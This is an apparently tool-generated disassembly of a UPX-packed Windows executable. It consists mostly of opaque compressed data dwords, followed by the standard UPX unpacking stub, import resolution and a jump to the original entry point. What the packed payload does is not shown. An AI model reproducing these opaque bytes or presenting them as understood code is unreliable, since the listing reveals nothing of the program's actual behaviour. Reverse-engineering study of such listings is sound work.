dd 8CE484F2h, 374305Ah, 8C5A6588h, 0E70946E9h, 12E43DF2h
dd 64456C51h, 4C3F9ADBh, 1758425Bh, 0E7B56CD2h, 0BA17D929h
dd 96D09797h, 52AE401h, 8C958F5Ch, 2980043Ch, 6480C64Bh
dd 7BAFA70Ch, 93197064h, 556A1000h, 69265986h, 0D077376Ah
dd 7E122121h, 767F6516h, 95902B19h, 23FA145Fh, 83A93F5Ah
dd 32878C5h
dd 65272172h, 281F9909h, 11305FD8h, 0F0F0DFBFh, 0E9415781h
dd 4C6FFA92h, 32EB0040h, 97812C68h, 15D07A12h, 0BF88C9C4h
dd 0F5682674h, 0DA3D9972h, 4A9F03E8h, 57297446h, 0C574683Eh
dd 0A1746827h, 0C25EAF5Fh, 5A23742Ah, 220CB9F0h, 77E60F1Dh
dd 7C482035h, 0C8033C48h, 0BE8D53A4h, 18721B11h, 38408B64h
dd 75D6AD89h, 0E8086D87h, 0A89153A6h, 50283998h, 882303FBh
dd 8B638C68h, 0BBFD6EA0h, 0EBDAAC3Ah, 0F7F0F909h, 83F61BDEh
dd 85853CE6h, 3E8302ACh, 0EC947540h, 25B722CFh, 79AFEF0Ah
dd 56F6FAE8h, 98906CAAh, 80C33BD0h, 320775FCh, 3FA5D96Dh
dd 685D1BFAh, 2605CDAEh, 0D6716D00h, 25FCAF01h, 497139ECh
dd 127C121Eh, 1432EF12h, 0C126AC09h, 6781C045h, 9216B1A2h
dd 83FBFEAh, 401ABBC8h, 0EE1D57B3h, 871FC0EAh, 60A3654h
dd 0B0B3BC0h, 89E23099h, 0DFBFF45Dh, 0EEA96715h, 0DCE87D8Bh
dd 88E06801h, 52CA646Dh, 0CAE0AE69h, 0A5476F8Dh, 0EC755077h
dd 1DFCEA7Ah, 0E4A5F7F0h, 8B144810h, 4D033A15h, 44FA80F8h
dd 11FB16FFh, 8942077Dh, 8BF44811h, 81C62BC7h, 997E2DFAh
dd 18B1D8C1h, 0C6033441h, 0E16A5870h, 0BE8D38FFh, 78810975h
dd 9078B06h, 0EDAB03FEh, 5F6FE3ECh, 410302D2h, 728D1A0Ch
dd 0A3FE81C4h, 753116B6h, 0EB1C6FFFh, 0EB08BD0Dh, 39664001h
dd 40FA7518h, 0DBEF0540h, 24B2CEC9h, 4956C3F0h, 0FFEC9E0Ch
dd 286A5FFFh, 0FC31545Eh, 3A40088Ah, 802A74CBh, 773F0F9h
dd 3C9B60Fh, 0FF6B6DD1h, 0AB0FEBDBh, 0FE18338h, 0B10E1C1h
dd 8B440ECFh, 0EED2D1B0h, 260A01D8h, 6AAAD975h, 972B2E31h
dd 236C81A5h, 2B712EC3h, 516D5B7Dh, 2131F0A4h, 6275DD39h
dd 55FC2075h, 1874B368h, 8D57E7E6h, 230C2484h, 2675796Ch
dd 0C9E10BAh, 9A7401B3h, 7FD12A57h, 46EB5292h, 1DE02F68h
dd 18836AAAh, 7F061AD1h, 0CFD04029h, 106FB656h, 23105F51h
dd 0B7E89C8h, 0A4BDE560h, 68651FFDh, 77CD9567h, 92C46536h
dd 92FCFF59h, 1D61E232h, 0C38A4269h, 0C9523ECh, 1B014C70h
dd 0E43B128h, 5390C473h, 0D01937E6h, 83431BFEh, 6FB89AF0h
dd 8953F633h, 0AFEC354h, 17C94048h, 2E7B5671h, 5384AE04h
dd 0B1BF130Dh, 487EC9A0h, 0A1374A68h, 87047B49h, 0D779852Ch
dd 320C2EB4h, 92DE233Dh, 6AB31E28h, 3643740h, 56BC4D2Eh
dd 0B623B846h, 0CF22491Bh, 1C66E4FFh, 180F64E8h, 64C76DD6h
dd 0DB66036Eh, 0C60CB7A2h, 0EDD693B8h, 79003582h, 1A35FFCCh
dd 0CCA60510h, 250C376Eh, 175A480Eh, 978DFAEAh, 8B16EFFDh
dd 3B681C3Dh, 537B88BFh, 52526AEDh, 0E3603098h, 535F593Fh
dd 995F4CEh, 0EC247E31h, 768AA260h, 21AE5853h, 5E702850h
dd 0B9058B04h, 3CC2204Eh, 6857DF8Dh, 58856ADCh, 4B709C69h
dd 0B64E0305h, 0ECD3ACE8h, 0BABF7D43h, 586025C3h, 0C4C23BBEh
dd 7975BFBBh, 89C93353h, 948D1574h, 8010C50Dh, 0BFF51B7Ah
dd 89039441h, 3B41FC55h, 8CEB75C8h, 0D2FAB68Bh, 20B811EEh
dd 0B0D00B00h, 6C707865h, 967FF7DCh, 510CBF7Fh, 726F1004h
dd 49E67265h, 0DBC80B08h, 0D16DB6CFh, 1065222Eh, 480C45D5h
dd 559BC409h, 2CDF3025h, 87E012C4h, 0C87D755Bh, 0ABF338A4h
dd 5E01CB1h, 9E5C8EBh, 0DB900D2Bh, 0F33B850Bh, 86CD59h
dd 1617F1CFh, 0FF685364h, 33861F0Fh, 0D427C818h, 9F105774h
dd 0DB0B953Dh, 1B996C87h, 58306A66h, 0D37E5990h, 24CBC9A4h
dd 943D1212h, 420BF518h, 20C47FC2h, 0A30E0F44h, 6840941Ch
dd 0DE4177DAh, 0AD05ED50h, 70E0D89h, 3E0CDBBEh, 6A80ED19h
dd 0CFC8E06h, 0CC206A51h, 422D81F3h, 0AB9FD604h, 0B4165610h
dd 0F43164EDh, 321B7DB9h, 0D06349CFh, 0D651F84Eh, 0E41977FDh
dd 55D86160h, 33F855FBh, 4BF02D6Bh, 67DC68C7h, 0E87D7A21h
dd 0BB96CEA1h, 0FC0660E1h, 5602F4BAh, 0E10CE7Bh, 20FF4F5Ah
dd 4858F971h, 264E80EBh, 16AB2C59h, 4EB27FB2h, 2210A390h
dd 6A8DAEB3h, 5EA99088h, 60F258EBh, 440EFE1Bh, 9A3DB05Dh
dd 0B21549F1h, 0CC288DFh, 0FFF16C00h, 244C431Bh, 1BC82B04h
dd 23D0F7C0h, 62C48BC8h, 7FAD01F0h, 0A7203A9h, 9459C18Bh
dd 40A31F8Bh, 2D5A2D53h, 0B948543h, 0F644051Bh, 500007Bh
dd 20083FFh, 35112549h, 3C4C4835h, 97FB1F6Eh, 4D510015h
dd 3D393135h, 2159000Ah, 5511013Dh, 0C7ECFDCCh, 149450Ch
dd 162145h, 0C5D1501h, 7D837730h, 115D0017h, 3421494Dh
dd 5D490F7Dh, 0EF8AEF09h, 493925EDh, 11651137h, 1C434C1Bh
dd 0FF701521h, 2B7FEDDBh, 1539091Ch, 100A4C11h, 150D0B51h
dd 3C11351Dh, 5F452545h, 78BAEEC6h, 58037051h, 401F5048h
dd 41652119h, 0BAE6F7BBh, 33291E59h, 51392D3Ah, 93D0B27h
dd 0F6D83FB3h, 115294Dh, 550F4D18h, 2D41295Dh, 6F630C1Dh
dd 5129FB07h, 1721013Dh, 3D922521h, 310D5D19h, 0FFBBB9B6h
dd 31553D09h, 9003949h, 2D29AB6Ch, 9515561h, 0E6FFF678h
dd 0F51F3342h, 55552500h, 38386C45h, 0F63C1961h, 45FBBFFFh
dd 4F155155h, 386D210Dh, 19394D45h, 59213849h, 116D1911h
dd 0ECDF6D51h, 38D87EDFh, 4D195927h, 3941234Dh, 253C2555h
dd 22ED2629h, 0F50001FCh, 29513D45h, 29150B09h, 0BB1ED685h
dd 0D01392Eh, 9F2D01F5h, 83B66289h, 3D1B61FCh, 2151591Dh
dd 617B6129h, 0F7F61FE4h, 0D513F0Ah, 192D2359h, 65455511h
dd 76CD0A16h, 89AF1510h, 35A25F29h, 12F6B0FFh, 1049518Bh
dd 9511C90Dh, 57510D11h, 19FDAD78h, 5D214DC5h, 1F3BF321h
dd 5FDB1A09h, 0BDC7041Eh, 21DDB155h, 1DB95911h, 40DC092Ah
dd 0C2558670h, 8100BC63h, 6DF6BD4h, 4D393545h, 20330F53h
dd 0B0041A1h, 0A8B2014h, 550D9111h, 0BFF20900h, 3058573Ch
dd 74736C01h, 79706372h, 0B3E43E41h, 69706D0Fh, 656C1441h
dd 4174616Eh, 0D9A7FF73h, 77146531h, 69727073h, 1366746Eh
dd 0E41FFF01h, 121F0FFh, 20062A14h, 0F320906h, 1A36140Fh
dd 3E191A21h, 0FDBF172Bh, 806FDDFh, 2B0D130Bh, 0E441005h
dd 4E0E1537h, 31102310h, 571A0C21h, 0FFFF0584h, 3F077F77h
dd 15050A06h, 173D053Ch, 1608142Eh, 20130C49h, 516063Ch
dd 6DFF2C0Eh, 707EEF7h, 100C0210h, 231F3268h, 103E030Fh
dd 0C17132Ah, 0FEDF1724h, 2C6EDD77h, 51035D10h, 14161038h
dd 39500D24h, 1A225E10h, 0EFFE1417h, 1516DDF6h, 13280C25h
dd 126C1305h, 10140017h, 0E0A0E08h, 77F6F608h, 9332BEBh
dd 0C491518h, 10053E2Fh, 0E153D1Eh, 27DADEF6h, 27410350h
dd 4B05143Fh, 0EDBF6F24h, 162E12DFh, 0E190925h, 67310E0Ch
dd 10810D1Dh, 6DFB3719h, 2519FBBBh, 0E203B0Ch, 381B6218h
dd 5508082Ah, 32061306h, 0EEFF6FEEh, 123B2834h, 61253219h
dd 76090B3Ah, 1E092F09h, 0FDBF171Ch, 0C226B7FFh, 1B12151Ch
dd 39120506h, 0B880C3Ch, 220C1A15h, 322331CDh, 8B7F260Eh
dd 6809EC1Fh, 10160D10h, 3F455000h, 4014Ch, 0DB35F107h
dd 46ACC87Fh, 10200E0h, 0C08010Bh, 80A60E22h, 0F4139EE6h
dd 2F2E042Ch, 66F96C16h, 4020B04h, 0D9D90733h, 700C6E92h
dd 0BC2B101Eh, 7B25E2Ch, 4248B806h, 0B241DB33h, 8848603Ch
dd 97590300h, 1E1CA20Ah, 6C17D82Eh, 786574F3h, 90207B74h
dd 0B37D04EBh, 205CDC6Dh, 7764722Eh, 0B3F68361h, 0FBBDF653h
dd 406A2623h, 29B7262Eh
dd 1F736BECh, 4FC09250h, 83256C65h, 636FCB3Ch, 0E02A60D0h
dd 4237ED9Eh, 2342A01Bh, 59824Ah, 0
dd 0FF004800h, 0
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_AC = byte ptr -0ACh
pusha
mov esi, offset dword_407000
lea edi, [esi-6000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_408362
; ---------------------------------------------------------------------------
align 8
loc_408358: ; CODE XREF: start:loc_408369�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_40835E: ; CODE XREF: start+B6�j start+CD�j
add ebx, ebx
jnz short loc_408369
loc_408362: ; CODE XREF: start+10�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_408369: ; CODE XREF: start+20�j
jb short loc_408358
mov eax, 1
loc_408370: ; CODE XREF: start+3F�j start+4A�j
add ebx, ebx
jnz short loc_40837B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40837B: ; CODE XREF: start+32�j
adc eax, eax
add ebx, ebx
jnb short loc_408370
jnz short loc_40838C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_408370
loc_40838C: ; CODE XREF: start+41�j
xor ecx, ecx
sub eax, 3
jb short loc_4083A0
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_408412
mov ebp, eax
loc_4083A0: ; CODE XREF: start+51�j
add ebx, ebx
jnz short loc_4083AB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4083AB: ; CODE XREF: start+62�j
adc ecx, ecx
add ebx, ebx
jnz short loc_4083B8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4083B8: ; CODE XREF: start+6F�j
adc ecx, ecx
jnz short loc_4083DC
inc ecx
loc_4083BD: ; CODE XREF: start+8C�j start+97�j
add ebx, ebx
jnz short loc_4083C8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4083C8: ; CODE XREF: start+7F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_4083BD
jnz short loc_4083D9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_4083BD
loc_4083D9: ; CODE XREF: start+8E�j
add ecx, 2
loc_4083DC: ; CODE XREF: start+7A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_4083FC
loc_4083ED: ; CODE XREF: start+B4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_4083ED
jmp loc_40835E
; ---------------------------------------------------------------------------
align 4
loc_4083FC: ; CODE XREF: start+AB�j start+C9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_4083FC
add edi, ecx
jmp loc_40835E
; ---------------------------------------------------------------------------
loc_408412: ; CODE XREF: start+5C�j
pop esi
mov edi, esi
mov ecx, 0A6h
loc_40841A: ; CODE XREF: start+E1�j start+E6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_40841F: ; CODE XREF: start+104�j
cmp al, 1
ja short loc_40841A
cmp byte ptr [edi], 1
jnz short loc_40841A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_40841F
lea edi, [esi+6000h]
loc_40844C: ; CODE XREF: start+12E�j
mov eax, [edi]
or eax, eax
jz short loc_40848E
mov ebx, [edi+4]
lea eax, [eax+esi+8000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+803Ch]
xchg eax, ebp
loc_408469: ; CODE XREF: start+146�j
mov al, [edi]
inc edi
or al, al
jz short loc_40844C
mov ecx, edi
push edi
dec eax
repne scasb
push ebp
call dword ptr [esi+8040h]
or eax, eax
jz short loc_408488
mov [ebx], eax
add ebx, 4
jmp short loc_408469
; ---------------------------------------------------------------------------
loc_408488: ; CODE XREF: start+13F�j
call dword ptr [esi+8048h]
loc_40848E: ; CODE XREF: start+110�j
add edi, 4
lea ebx, [esi-4]
loc_408494: ; CODE XREF: start+170�j
xor eax, eax
mov al, [edi]
inc edi
or eax, eax
jz short loc_4084BF
cmp al, 0EFh
ja short loc_4084B2
loc_4084A1: ; CODE XREF: start+17D�j
add ebx, eax
mov eax, [ebx]
xchg al, ah
rol eax, 10h
xchg al, ah
add eax, esi
mov [ebx], eax
jmp short loc_408494
; ---------------------------------------------------------------------------
loc_4084B2: ; CODE XREF: start+15F�j
and al, 0Fh
shl eax, 10h
mov ax, [edi]
add edi, 2
jmp short loc_4084A1
; ---------------------------------------------------------------------------
loc_4084BF: ; CODE XREF: start+15B�j
mov ebp, [esi+8044h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+1EFh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp+2Ch+var_AC]
loc_4084F3: ; CODE XREF: start+1B7�j
push 0
cmp esp, eax
jnz short loc_4084F3
sub esp, 0FFFFFF80h
jmp sub_402CF4
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 409000h
dd 3 dup(0)
dd 9058h, 903Ch, 3 dup(0)
dd 9065h, 9050h, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E6169Ah, 77E75CB5h, 0
aJW db 'jÉÔw',0
align 4
aKernel32_dll db 'KERNEL32.DLL',0
aUser32_dll db 'USER32.dll',0
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 50746547h, 41636F72h
dd 65726464h, 7373h, 74726956h, 506C6175h, 65746F72h, 7463h
dd 74697845h, 636F7250h, 737365h, 73770000h, 6E697270h
dd 416674h, 8000h, 0Ch, 3342h, 3CFh dup(0)
UPX2 ends
; Section 4. (virtual address 0000A000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 40A000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start